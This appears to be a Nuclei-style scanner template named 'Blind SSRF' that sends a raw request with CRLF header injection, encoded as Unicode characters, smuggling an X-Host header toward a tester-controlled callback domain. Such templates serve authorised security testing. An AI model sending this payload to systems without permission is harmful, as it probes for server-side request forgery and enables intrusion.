id: 0x113

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
    - |+
      GET /%20HTTP/1.1\u560d\u560aX-Host:%20{{Host}}.{{Port}}.BSSRF-113.{{MY-DOMAIN}}\u560d\u560a\u560d\u560a HTTP/1.1
      Host: {{Hostname}}
      Cache-Control: no-transform
      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
      Accept-Encoding: gzip, deflate
      Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"